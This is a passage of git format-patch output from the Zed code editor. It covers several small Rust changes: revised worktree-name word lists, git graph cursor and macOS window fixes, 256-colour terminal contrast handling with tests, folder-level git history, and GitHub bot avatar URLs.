"lilac", "limber", "lively", "local", - "lofty", "lucid", "lunar", "major", "maple", "mellow", "merry", "mild", "milky", "misty", - "modal", "modest", "mossy", "muted", "native", "naval", "neat", "nimble", "noble", "north", - "novel", "oaken", "ochre", "olive", "onyx", "opal", "open", "optic", "outer", "owed", "ozone", - "pale", "pastel", "pearl", "pecan", "peppy", "pilot", "placid", "plain", "plum", "plush", - "poised", "polar", "polished", "poplar", "prime", "proof", "proud", "pure", "quartz", "quick", - "quiet", "rapid", "raspy", "ready", "regal", "rooted", "rosy", "round", "royal", "ruby", - "ruddy", "russet", "rustic", "sage", "salty", "sandy", "satin", "scenic", "sedge", "serene", - "sharp", "sheer", "silky", "silver", "sleek", "smart", "smooth", "snowy", "solar", "solid", - "south", "spry", "stark", "steady", "steel", "steep", "still", "stoic", "stony", "stout", - "sturdy", "suede", "sunny", "supple", "sure", "swift", "tall", "tawny", "teal", "terse", - "thick", "tidal", "tidy", "timber", "topaz", "total", "trim", "tropic", "true", "tulip", - "upper", "urban", "valid", "vast", "velvet", "verde", "vivid", "vocal", "warm", "waxen", - "west", "whole", "wide", "wild", "wise", "witty", "woven", "young", "zealous", "zephyr", - "zesty", "zinc", + "able", "agate", "airy", "alpine", "amber", "ample", "aqua", "arctic", "arid", "ashen", + "astral", "autumn", "avid", "balmy", "birch", "bold", "boreal", "brave", "breezy", "brief", + "bright", "brisk", "broad", "bronze", "calm", "cerith", "cheery", "civil", "clean", "clear", + "clever", "cobalt", "cool", "copper", "coral", "cozy", "crisp", "cubic", "cyan", "deft", + "dense", "dewy", "direct", "dusky", "dusty", "early", "earnest", "earthy", "elder", "elfin", + "equal", "even", "exact", "faint", "fair", "fast", "fawn", "ferny", "fiery", "fine", "firm", + "fleet", "floral", "focal", "fond", "frank", "fresh", "frosty", "full", "gentle", "gilded", + "glacial", "glad", "glossy", "golden", "grand", "green", "gusty", "hale", 
"happy", "hardy", + "hazel", "hearty", "hilly", "humble", "hushed", "icy", "ideal", "inky", "iron", "ivory", + "jade", "jovial", "keen", "kind", "lapis", "leafy", "level", "light", "lilac", "limber", + "lively", "lofty", "loyal", "lucid", "lunar", "major", "maple", "marshy", "mellow", "merry", + "mild", "milky", "misty", "modest", "mossy", "muted", "narrow", "naval", "neat", "nimble", + "noble", "north", "novel", "oaken", "ochre", "olive", "onyx", "opal", "optic", "ornate", + "oval", "owed", "ozone", "pale", "pastel", "pearl", "pecan", "peppy", "pilot", "placid", + "plain", "plucky", "plum", "plush", "poised", "polar", "polished", "poplar", "prime", "proof", + "proud", "quartz", "quick", "quiet", "rainy", "rapid", "raspy", "ready", "regal", "roomy", + "rooted", "rosy", "round", "royal", "ruddy", "russet", "sage", "salty", "sandy", "satin", + "scenic", "sedge", "serene", "sheer", "silky", "silver", "sleek", "smart", "smooth", "snowy", + "snug", "solar", "solid", "south", "spry", "stark", "steady", "steel", "steep", "still", + "stocky", "stoic", "stony", "stout", "sturdy", "suede", "sunny", "supple", "sure", "tall", + "tangy", "tawny", "teal", "terse", "thick", "tidal", "tidy", "timber", "topaz", "total", + "trim", "tropic", "tulip", "upper", "urban", "vast", "velvet", "verde", "vivid", "vocal", + "warm", "waxen", "west", "whole", "wide", "wild", "wise", "witty", "woven", "young", "zealous", + "zephyr", "zesty", "zinc", ]; const NOUNS: &[&str] = &[ - "anchor", "anvil", "arbor", "arch", "arrow", "atlas", "badge", "badger", "basin", "bay", - "beacon", "beam", "bell", "birch", "blade", "bloom", "bluff", "bolt", "bower", "breeze", - "bridge", "brook", "bunting", "cabin", "cairn", "canyon", "cape", "cedar", "chasm", "cliff", - "cloud", "clover", "coast", "cobble", "colt", "comet", "condor", "coral", "cove", "crane", - "crater", "creek", "crest", "curlew", "cypress", "dale", "dawn", "delta", "den", "dove", - "drake", "drift", "drum", "dune", "dusk", "eagle", "echo", 
"egret", "elk", "elm", "ember", - "falcon", "fawn", "fern", "ferry", "field", "finch", "fjord", "flame", "flint", "flower", - "forge", "fossil", "fox", "frost", "gale", "garnet", "gate", "gazelle", "geyser", "glade", + "acorn", "almond", "anvil", "apricot", "arbor", "atlas", "badge", "badger", "basin", "bay", + "beacon", "beam", "bell", "birch", "blade", "bloom", "bluff", "bobcat", "bolt", "breeze", + "bridge", "brook", "bunting", "burrow", "cabin", "cairn", "canyon", "cape", "cedar", "chasm", + "cliff", "clover", "coast", "cobble", "colt", "comet", "conch", "condor", "coral", "cove", + "coyote", "crane", "crater", "creek", "crest", "curlew", "daisy", "dale", "dawn", "den", + "dove", "drake", "drift", "drum", "dune", "dusk", "eagle", "eel", "egret", "elk", "emu", + "falcon", "fawn", "fennel", "fern", "ferret", "ferry", "fig", "finch", "fjord", "flicker", + "flint", "flower", "fox", "frost", "gale", "garnet", "gate", "gazelle", "geyser", "glade", "glen", "gorge", "granite", "grove", "gull", "harbor", "hare", "haven", "hawk", "hazel", "heath", "hedge", "heron", "hill", "hollow", "horizon", "ibis", "inlet", "isle", "ivy", - "jackal", "jasper", "juniper", "kestrel", "kinglet", "knoll", "lagoon", "lake", "lantern", - "larch", "lark", "laurel", "lava", "leaf", "ledge", "lily", "linden", "lodge", "loft", "lotus", - "lynx", "mantle", "maple", "marble", "marsh", "marten", "meadow", "merlin", "mesa", "mill", - "mint", "moon", "moose", "moss", "newt", "north", "nutmeg", "oak", "oasis", "obsidian", - "orbit", "orchid", "oriole", "osprey", "otter", "owl", "palm", "panther", "pass", "path", - "peak", "pebble", "pelican", "peony", "perch", "pier", "pine", "plover", "plume", "pond", - "poppy", "prairie", "prism", "puma", "quail", "quarry", "quartz", "rain", "rampart", "range", - "raven", "ravine", "reed", "reef", "ridge", "river", "robin", "rowan", "sage", "salmon", - "sequoia", "shore", "shrike", "sigma", "sky", "slate", "slope", "snow", "spark", "sparrow", - "spider", "spruce", 
"stag", "star", "stone", "stork", "storm", "stream", "summit", "swift", - "sycamore", "tern", "terrace", "thistle", "thorn", "thrush", "tide", "timber", "torch", - "tower", "trail", "trout", "tulip", "tundra", "vale", "valley", "veranda", "viper", "vista", - "vole", "walrus", "warbler", "willow", "wolf", "wren", "yew", "zenith", + "jackal", "jasper", "juniper", "kinglet", "kitten", "knoll", "lagoon", "lake", "lantern", + "larch", "lark", "laurel", "lava", "leaf", "ledge", "lily", "linden", "lodge", "loft", "loon", + "lotus", "mantle", "maple", "marble", "marsh", "marten", "meadow", "merlin", "mill", "minnow", + "moon", "moose", "moss", "moth", "newt", "north", "nutmeg", "oak", "oasis", "obsidian", + "orbit", "orchid", "oriole", "osprey", "otter", "owl", "palm", "panther", "pass", "peach", + "peak", "pebble", "pelican", "peony", "perch", "pier", "pike", "pine", "plover", "plume", + "pond", "poppy", "prairie", "prism", "quail", "quarry", "quartz", "rain", "rampart", "raven", + "ravine", "reed", "reef", "ridge", "river", "robin", "rook", "rowan", "sage", "salmon", + "sequoia", "shore", "shrew", "shrike", "sigma", "sky", "slope", "snipe", "snow", "sparrow", + "spruce", "stag", "star", "starling", "stoat", "stone", "stork", "storm", "strand", "summit", + "sycamore", "tern", "terrace", "thistle", "thorn", "thrush", "tide", "timber", "toucan", + "trail", "trout", "tulip", "tundra", "turtle", "vale", "valley", "veranda", "violet", "viper", + "vole", "walrus", "warbler", "willow", "wolf", "wren", "yak", "zenith", ]; -/// Generates a worktree name in `"adjective-noun"` format (e.g. `"swift-falcon"`). +/// Generates a worktree name in `"adjective-noun"` format (e.g. `"calm-river"`). /// /// Tries up to 10 random combinations, skipping any name that already appears /// in `existing_names`. Returns `None` if no unused name is found. 
From e0b732ee56301f12b24fa25fc40b631ca1d6466a Mon Sep 17 00:00:00 2001 From: Jake Norris <102190210+jakenorris1124@users.noreply.github.com> Date: Thu, 30 Apr 2026 07:41:26 -0400 Subject: [PATCH 117/231] git_graph: Fix mouse cursor not switching to cursor pointer in git graph (#55247) This PR calls 'cursor_pointer()' on the appropriate UI elements. It is a very small change, but it is my first time contributing, so please let me know if I have made any mistakes. Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [ ] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #55218 Release Notes: - Fixed the mouse cursor not switching to cursor pointer when hovering commit rows in the git graph --- crates/git_graph/src/git_graph.rs | 2 ++ 1 file changed, 2 insertions(+) diff --git a/crates/git_graph/src/git_graph.rs b/crates/git_graph/src/git_graph.rs index a69da25daa9018..e98e635c1411f3 100644 --- a/crates/git_graph/src/git_graph.rs +++ b/crates/git_graph/src/git_graph.rs @@ -2811,6 +2811,7 @@ impl Render for GitGraph { .id("graph-canvas") .size_full() .overflow_hidden() + .cursor_pointer() .child( div() .size_full() @@ -2846,6 +2847,7 @@ impl Render for GitGraph { }; row.h(row_height) + .cursor_pointer() .when(is_selected, |row| row.bg(selected_bg)) .when(is_hovered && !is_selected, |row| row.bg(hover_bg)) .on_hover(move |&is_hovered, _, cx| { From ebe1b2283c3b9abfc470e63ac101c6b96cb31280 Mon Sep 17 00:00:00 2001 From: Bennet Bo Fenner Date: Thu, 30 Apr 2026 15:48:00 +0200 Subject: [PATCH 118/231] Fix macOS traffic light position when performing a project search (#55310) Regression introduced in #48029, applying the same workaround here that we seem to use for `setDocumentEdited` 
Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - (Preview only) Fixed an issue on macOS where the traffic light position would be wrong when opening the project search --- crates/gpui_macos/src/window.rs | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/crates/gpui_macos/src/window.rs b/crates/gpui_macos/src/window.rs index b8dafbbc90bdc5..c4c47c4f542468 100644 --- a/crates/gpui_macos/src/window.rs +++ b/crates/gpui_macos/src/window.rs @@ -1482,6 +1482,10 @@ impl PlatformWindow for MacWindow { let filename = path.map_or(ns_string(""), |p| ns_string(&p.to_string_lossy())); let _: () = msg_send![window, setRepresentedFilename: filename]; } + + // Changing the document path state resets the traffic light position, + // so we have to move it again. 
+ self.0.lock().move_traffic_light(); } fn show_character_palette(&self) { From 5d263c142e78cd9707735ea53f8df43f7c310f32 Mon Sep 17 00:00:00 2001 From: Malix - Alix Brunet Date: Thu, 30 Apr 2026 15:49:56 +0200 Subject: [PATCH 119/231] Update feature request link (#55258) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability --- .github/ISSUE_TEMPLATE/config.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/ISSUE_TEMPLATE/config.yml b/.github/ISSUE_TEMPLATE/config.yml index 9bf14ce72d5feb..628579b2340d8a 100644 --- a/.github/ISSUE_TEMPLATE/config.yml +++ b/.github/ISSUE_TEMPLATE/config.yml @@ -2,7 +2,7 @@ blank_issues_enabled: false contact_links: - name: Feature request - url: https://github.com/zed-industries/zed/discussions/new/choose + url: https://github.com/zed-industries/zed/discussions/new?category=feature-requests about: To request a feature, open a new discussion under one of the appropriate categories. - name: Our Discord community url: https://discord.com/invite/zedindustries From 1f491524098a8ff7a9b9dae2c8a2b1fb575bd996 Mon Sep 17 00:00:00 2001 From: Finn Eitreim <48069764+feitreim@users.noreply.github.com> Date: Thu, 30 Apr 2026 10:01:32 -0400 Subject: [PATCH 120/231] terminal: Fix 8 bit colors (#54565) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Right now the terminal rendering code applies a minimum contrast value (which is good, and for accessibility) to colors that appear, there was already an exemption from this for 24bit color specification, because the application explicitly asked for that color, so it should be rendered that color. My change changes that exemption to also include ansi colors 16-255, because these are also set explicitly, the normal, non-exempt case is now the default ansi colors, 0-15, these are set by the theme and are usually specified as just 'red' or 'green', hence the importance of the min contrast. 
Here's what the gradient ramp from the original issue looks like now: Screenshot 2026-04-22 at 6 45 43 PM This matches ghostty and VSCodium from the original issue. The test prevents regressions but may not be strictly necessary. Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #54396 Release Notes: - terminal: Improved 256 color ansi rendering --- crates/terminal_view/src/terminal_element.rs | 69 ++++++++++++++++++-- 1 file changed, 65 insertions(+), 4 deletions(-) diff --git a/crates/terminal_view/src/terminal_element.rs b/crates/terminal_view/src/terminal_element.rs index 8f46e8f9b27af4..99918d4784834a 100644 --- a/crates/terminal_view/src/terminal_element.rs +++ b/crates/terminal_view/src/terminal_element.rs @@ -538,6 +538,20 @@ impl TerminalElement { ) } + /// Whether the application explicitly picked this foreground color and does not + /// want it adjusted for contrast: 24-bit true color (`\e[38;2;R;G;Bm`) or a + /// specific entry in the 256-color palette (`\e[38;5;Nm`) where N >= 16 (the + /// 6x6x6 cube at 16..=231 and the 24-step grayscale ramp at 232..=255). + /// Indices 0..=15 still go through contrast adjustment since those map to + /// theme-defined ANSI colors that can clash with the theme background. + fn is_app_chosen_exact_color(fg: &terminal::alacritty_terminal::vte::ansi::Color) -> bool { + matches!( + fg, + terminal::alacritty_terminal::vte::ansi::Color::Spec(_) + | terminal::alacritty_terminal::vte::ansi::Color::Indexed(16..=255) + ) + } + /// Converts the Alacritty cell styles to GPUI text styles and background color. 
fn cell_style( indexed: &IndexedCell, @@ -549,13 +563,11 @@ impl TerminalElement { minimum_contrast: f32, ) -> TextRun { let flags = indexed.cell.flags; - let is_true_color = matches!(fg, terminal::alacritty_terminal::vte::ansi::Color::Spec(_)); + let skip_contrast = Self::is_app_chosen_exact_color(&fg); let mut fg = convert_color(&fg, colors); let bg = convert_color(&bg, colors); - // Skip contrast adjustment for true-color (24-bit RGB) foregrounds — the - // application chose that exact color. Also skip for decorative characters. - if !is_true_color && !Self::is_decorative_character(indexed.c) { + if !skip_contrast && !Self::is_decorative_character(indexed.c) { fg = ensure_minimum_contrast(fg, bg, minimum_contrast); } @@ -1819,6 +1831,55 @@ mod tests { assert!(!TerminalElement::is_decorative_character(' ')); } + #[test] + fn test_is_app_chosen_exact_color() { + use terminal::alacritty_terminal::vte::ansi::{Color, NamedColor, Rgb}; + + // Indices 0..=15 are theme-overridable ANSI colors; contrast adjustment must still apply. + assert!(!TerminalElement::is_app_chosen_exact_color( + &Color::Indexed(0) + )); + assert!(!TerminalElement::is_app_chosen_exact_color( + &Color::Indexed(15) + )); + + // Boundary: index 16 is the first entry of the 6x6x6 cube — application-chosen. + assert!(TerminalElement::is_app_chosen_exact_color(&Color::Indexed( + 16 + ))); + // Interior of the cube. + assert!(TerminalElement::is_app_chosen_exact_color(&Color::Indexed( + 17 + ))); + assert!(TerminalElement::is_app_chosen_exact_color(&Color::Indexed( + 231 + ))); + // Grayscale ramp boundaries. + assert!(TerminalElement::is_app_chosen_exact_color(&Color::Indexed( + 232 + ))); + assert!(TerminalElement::is_app_chosen_exact_color(&Color::Indexed( + 255 + ))); + + // 24-bit true color is always application-chosen. 
+ assert!(TerminalElement::is_app_chosen_exact_color(&Color::Spec( + Rgb { + r: 10, + g: 20, + b: 30 + } + ))); + + // Named colors are theme-defined and must go through contrast adjustment. + assert!(!TerminalElement::is_app_chosen_exact_color(&Color::Named( + NamedColor::Red + ))); + assert!(!TerminalElement::is_app_chosen_exact_color(&Color::Named( + NamedColor::Foreground + ))); + } + #[test] fn test_contrast_adjustment_logic() { // Test the core contrast adjustment logic without needing full app context From c55078fba9684044f3194a82b77cd017445c6098 Mon Sep 17 00:00:00 2001 From: robert7k Date: Thu, 30 Apr 2026 16:11:47 +0200 Subject: [PATCH 121/231] Add git log / history for folders and whole project (#52634) Allows using the "View history" functionality also on folders and the project root, and not only on files. Renamed "View file history" to "View history" in the context menu to make it consistent. project_history Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - Added git history for folders and whole project --------- Co-authored-by: Anthony Eid --- crates/git/src/git.rs | 2 +- crates/git/src/repository.rs | 12 ++--- crates/git_graph/src/git_graph.rs | 61 ++++++++++++----------- crates/project_panel/src/project_panel.rs | 15 +++--- 4 files changed, 47 insertions(+), 43 deletions(-) diff --git a/crates/git/src/git.rs b/crates/git/src/git.rs index d5274d24b513c8..cc3fbe1e2590cb 100644 --- a/crates/git/src/git.rs +++ b/crates/git/src/git.rs @@ -47,7 +47,7 @@ actions!( /// Shows git blame information for the current file. 
#[action(deprecated_aliases = ["editor::ToggleGitBlame"])] Blame, - /// Shows the git history for the current file. + /// Shows the git history for the selected file, folder, or project. FileHistory, /// Stages the current file. StageFile, diff --git a/crates/git/src/repository.rs b/crates/git/src/repository.rs index 3e5e14b310b6ae..69910d706e40b7 100644 --- a/crates/git/src/repository.rs +++ b/crates/git/src/repository.rs @@ -721,7 +721,7 @@ pub enum LogSource { All, Branch(SharedString), Sha(Oid), - File(RepoPath), + Path(RepoPath), } impl LogSource { @@ -732,7 +732,7 @@ impl LogSource { LogSource::Sha(oid) => { str::from_utf8(oid.as_bytes()).context("Failed to build str from sha") } - LogSource::File(_) => Ok("--follow"), + LogSource::Path(_) => Ok("--follow"), } } } @@ -2954,8 +2954,8 @@ impl GitRepository for RealGitRepository { log_source.get_arg()?, ]; - if let LogSource::File(file_path) = &log_source { - git_log_command.extend(["--", file_path.as_unix_str()]); + if let LogSource::Path(path) = &log_source { + git_log_command.extend(["--", path.as_unix_str()]); } let mut command = git.build_command(&git_log_command); @@ -3040,8 +3040,8 @@ impl GitRepository for RealGitRepository { args.push("--grep"); args.push(search_args.query.as_str()); - if let LogSource::File(file_path) = &log_source { - args.extend(["--", file_path.as_unix_str()]); + if let LogSource::Path(path) = &log_source { + args.extend(["--", path.as_unix_str()]); } let mut command = git.build_command(&args); diff --git a/crates/git_graph/src/git_graph.rs b/crates/git_graph/src/git_graph.rs index e98e635c1411f3..e92204c5f12fd0 100644 --- a/crates/git_graph/src/git_graph.rs +++ b/crates/git_graph/src/git_graph.rs @@ -834,20 +834,25 @@ fn resolve_file_history_target( ) -> Option<(RepositoryId, LogSource)> { if let Some(panel) = workspace.panel::(cx) && panel.read(cx).focus_handle(cx).contains_focused(window, cx) - && let Some(project_path) = panel.read(cx).selected_file_project_path(cx) + && let 
Some(project_path) = panel.read(cx).selected_entry_project_path(cx) { let git_store = workspace.project().read(cx).git_store(); let (repo, repo_path) = git_store .read(cx) .repository_and_path_for_project_path(&project_path, cx)?; - return Some((repo.read(cx).id, LogSource::File(repo_path))); + let log_source = if repo_path.is_empty() { + LogSource::All + } else { + LogSource::Path(repo_path) + }; + return Some((repo.read(cx).id, log_source)); } if let Some(panel) = workspace.panel::(cx) && panel.read(cx).focus_handle(cx).contains_focused(window, cx) && let Some((repository, repo_path)) = panel.read(cx).selected_file_history_target() { - return Some((repository.read(cx).id, LogSource::File(repo_path))); + return Some((repository.read(cx).id, LogSource::Path(repo_path))); } let editor = workspace.active_item_as::(cx)?; @@ -864,7 +869,7 @@ fn resolve_file_history_target( let (repo, repo_path) = git_store .read(cx) .repository_and_path_for_project_path(&project_path, cx)?; - Some((repo.read(cx).id, LogSource::File(repo_path))) + Some((repo.read(cx).id, LogSource::Path(repo_path))) } fn open_or_reuse_graph( @@ -1027,9 +1032,9 @@ impl GitGraph { .read(cx) .preview_fractions(window.rem_size()); - let is_file_history = matches!(self.log_source, LogSource::File(_)); - let graph_fraction = if is_file_history { 0.0 } else { fractions[0] }; - let offset = if is_file_history { 0 } else { 1 }; + let is_path_history = matches!(self.log_source, LogSource::Path(_)); + let graph_fraction = if is_path_history { 0.0 } else { fractions[0] }; + let offset = if is_path_history { 0 } else { 1 }; [ graph_fraction, @@ -1107,7 +1112,7 @@ impl GitGraph { let table_interaction_state = cx.new(|cx| TableInteractionState::new(cx)); - let column_widths = if matches!(log_source, LogSource::File(_)) { + let column_widths = if matches!(log_source, LogSource::Path(_)) { cx.new(|_cx| { RedistributableColumnsState::new( 4, @@ -2738,7 +2743,7 @@ impl Render for GitGraph { 
this.child(self.render_loading_spinner(cx)) }) } else { - let is_file_history = matches!(self.log_source, LogSource::File(_)); + let is_path_history = matches!(self.log_source, LogSource::Path(_)); let header_resize_info = HeaderResizeInfo::from_redistributable(&self.column_widths, cx); let header_context = TableRenderContext::for_column_widths( @@ -2766,7 +2771,7 @@ impl Render for GitGraph { .flex() .flex_col() .child(render_table_header( - if !is_file_history { + if !is_path_history { TableRow::from_vec( vec![ Label::new("Graph") @@ -2897,7 +2902,7 @@ impl Render for GitGraph { .child( h_flex() .size_full() - .when(!is_file_history, |this| { + .when(!is_path_history, |this| { this.child( div() .w(DefiniteLength::Fraction(graph_fraction)) @@ -3015,20 +3020,20 @@ impl Item for GitGraph { .file_name() .map(|name| name.to_string_lossy().to_string()) }); - let file_history_path = match &self.log_source { - LogSource::File(path) => Some(path.as_unix_str().to_string()), + let path_history_path = match &self.log_source { + LogSource::Path(path) => Some(path.as_unix_str().to_string()), _ => None, }; Some(TabTooltipContent::Custom(Box::new(Tooltip::element({ move |_, _| { v_flex() - .child(Label::new(if file_history_path.is_some() { - "File History" + .child(Label::new(if path_history_path.is_some() { + "Path History" } else { "Git Graph" })) - .when_some(file_history_path.clone(), |this, path| { + .when_some(path_history_path.clone(), |this, path| { this.child(Label::new(path).color(Color::Muted).size(LabelSize::Small)) }) .when_some(repo_name.clone(), |this, name| { @@ -3040,7 +3045,7 @@ impl Item for GitGraph { } fn tab_content_text(&self, _detail: usize, cx: &App) -> SharedString { - if let LogSource::File(path) = &self.log_source { + if let LogSource::Path(path) = &self.log_source { return path .as_ref() .file_name() @@ -3286,7 +3291,7 @@ mod persistence { pub const LOG_SOURCE_ALL: i32 = 0; pub const LOG_SOURCE_BRANCH: i32 = 1; pub const LOG_SOURCE_SHA: i32 = 2; - 
pub const LOG_SOURCE_FILE: i32 = 3; + pub const LOG_SOURCE_PATH: i32 = 3; pub const LOG_ORDER_DATE: i32 = 0; pub const LOG_ORDER_TOPO: i32 = 1; @@ -3298,7 +3303,7 @@ mod persistence { LogSource::All => LOG_SOURCE_ALL, LogSource::Branch(_) => LOG_SOURCE_BRANCH, LogSource::Sha(_) => LOG_SOURCE_SHA, - LogSource::File(_) => LOG_SOURCE_FILE, + LogSource::Path(_) => LOG_SOURCE_PATH, } } @@ -3307,7 +3312,7 @@ mod persistence { LogSource::All => None, LogSource::Branch(branch) => Some(branch.to_string()), LogSource::Sha(oid) => Some(oid.to_string()), - LogSource::File(path) => Some(path.as_unix_str().to_string()), + LogSource::Path(path) => Some(path.as_unix_str().to_string()), } } @@ -3334,11 +3339,11 @@ mod persistence { .and_then(|v| Oid::from_str(v).ok()) .map(LogSource::Sha) .unwrap_or_default(), - Some(LOG_SOURCE_FILE) => state + Some(LOG_SOURCE_PATH) => state .log_source_value .as_ref() .and_then(|v| RepoPath::new(v).ok()) - .map(LogSource::File) + .map(LogSource::Path) .unwrap_or_default(), None | Some(_) => LogSource::default(), } @@ -4432,7 +4437,7 @@ mod tests { assert_eq!(graphs.len(), 1); assert_eq!( graphs[0].read(cx).log_source, - LogSource::File(tracked1_repo_path.clone()) + LogSource::Path(tracked1_repo_path.clone()) ); }); @@ -4460,7 +4465,7 @@ mod tests { assert_eq!(graphs.len(), 1); assert_eq!( graphs[0].read(cx).log_source, - LogSource::File(tracked1_repo_path.clone()) + LogSource::Path(tracked1_repo_path.clone()) ); }); @@ -4540,7 +4545,7 @@ mod tests { .expect("expected a git graph"); assert_eq!( latest.read(cx).log_source, - LogSource::File(tracked2_repo_path) + LogSource::Path(tracked2_repo_path) ); }); } @@ -4549,11 +4554,11 @@ mod tests { fn test_serialized_state_roundtrip(_cx: &mut TestAppContext) { use persistence::SerializedGitGraphState; - let file_path = RepoPath::new(&"src/main.rs").unwrap(); + let path = RepoPath::new(&"src/main.rs").unwrap(); let sha = Oid::from_bytes(&[0xab; 20]).unwrap(); let state = SerializedGitGraphState { - 
log_source_type: Some(persistence::LOG_SOURCE_FILE), + log_source_type: Some(persistence::LOG_SOURCE_PATH), log_source_value: Some("src/main.rs".to_string()), log_order: Some(persistence::LOG_ORDER_TOPO), selected_sha: Some(sha.to_string()), @@ -4563,7 +4568,7 @@ mod tests { assert_eq!( persistence::deserialize_log_source(&state), - LogSource::File(file_path) + LogSource::Path(path) ); assert!(matches!( persistence::deserialize_log_order(&state), diff --git a/crates/project_panel/src/project_panel.rs b/crates/project_panel/src/project_panel.rs index ba6779e3e8b504..1ae5f424845075 100644 --- a/crates/project_panel/src/project_panel.rs +++ b/crates/project_panel/src/project_panel.rs @@ -1053,7 +1053,7 @@ impl ProjectPanel { || (settings.hide_root && visible_worktrees_count == 1)); let should_show_compare = !is_dir && self.file_abs_paths_to_diff(cx).is_some(); - let (has_git_repo, has_file_history) = { + let (has_git_repo, has_history) = { let project_path = project::ProjectPath { worktree_id, path: entry.path.clone(), @@ -1062,12 +1062,11 @@ impl ProjectPanel { let has_git_repo = git_store .repository_and_path_for_project_path(&project_path, cx) .is_some(); - let has_file_history = !is_dir - && has_git_repo + let has_history = has_git_repo && !git_store .project_path_git_status(&project_path, cx) .is_some_and(|status| status.is_created()); - (has_git_repo, has_file_history) + (has_git_repo, has_history) }; let has_pasteable_content = self.has_pasteable_content(cx); @@ -1143,8 +1142,8 @@ impl ProjectPanel { ) }) .action("Add to .gitignore", Box::new(git::AddToGitignore)) - .when(has_file_history, |menu| { - menu.action("View File History", Box::new(git::FileHistory)) + .when(has_history, |menu| { + menu.action("View History", Box::new(git::FileHistory)) }) }) .when(!should_hide_rename, |menu| { @@ -3791,11 +3790,11 @@ impl ProjectPanel { Some((worktree.read(cx), entry)) } - pub fn selected_file_project_path(&self, cx: &App) -> Option { + pub fn 
selected_entry_project_path(&self, cx: &App) -> Option { let (worktree, entry) = self.selected_sub_entry(cx)?; Some(ProjectPath { worktree_id: worktree.read(cx).id(), - path: entry.is_file().then(|| entry.path.clone())?, + path: entry.path.clone(), }) } From 2458f2f2c4f345f5420c14716860769bae931c2b Mon Sep 17 00:00:00 2001 From: tsutoringo <33830878+tsutoringo@users.noreply.github.com> Date: Thu, 30 Apr 2026 23:17:32 +0900 Subject: [PATCH 122/231] Fix GitHub bot avatar URL (#55297) ## Summary - Fix GitHub avatar URL generation for bot noreply commit authors - Fall back to the GitHub commit author API when the CDN email avatar endpoint cannot resolve bot noreply emails - Add tests covering bot noreply and regular user noreply author emails - Before image - After image ## Test Plan - `cargo test -p git_hosting_providers --features gpui/test-support` Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - Fixed GitHub avatar lookup for bot noreply commit authors. 
--------- Co-authored-by: Christopher Biscardi --- .../src/providers/github.rs | 43 +++++++++++++++++-- 1 file changed, 40 insertions(+), 3 deletions(-) diff --git a/crates/git_hosting_providers/src/providers/github.rs b/crates/git_hosting_providers/src/providers/github.rs index 23aff64de93b89..df3637c49d2389 100644 --- a/crates/git_hosting_providers/src/providers/github.rs +++ b/crates/git_hosting_providers/src/providers/github.rs @@ -68,8 +68,12 @@ pub struct Github { base_url: Url, } +fn normalize_author_email(email: &str) -> &str { + email.trim_start_matches('<').trim_end_matches('>') +} + fn build_cdn_avatar_url(email: &str) -> Result { - let email = email.trim_start_matches('<').trim_end_matches('>'); + let email = normalize_author_email(email); Url::parse(&format!( "https://avatars.githubusercontent.com/u/e?email={}&s=128", encode(email) @@ -77,6 +81,15 @@ fn build_cdn_avatar_url(email: &str) -> Result { .context("failed to construct avatar URL") } +fn build_cdn_avatar_url_for_author_email(email: &str) -> Result> { + let email = normalize_author_email(email); + if email.ends_with("[bot]@users.noreply.github.com") { + return Ok(None); + } + + build_cdn_avatar_url(email).map(Some) +} + impl Github { pub fn new(name: impl Into, base_url: Url) -> Self { Self { @@ -267,8 +280,10 @@ impl GitHostingProvider for Github { author_email: Option, http_client: Arc, ) -> Result> { - if let Some(email) = author_email { - return Ok(Some(build_cdn_avatar_url(&email)?)); + if let Some(email) = author_email + && let Some(avatar_url) = build_cdn_avatar_url_for_author_email(&email)? 
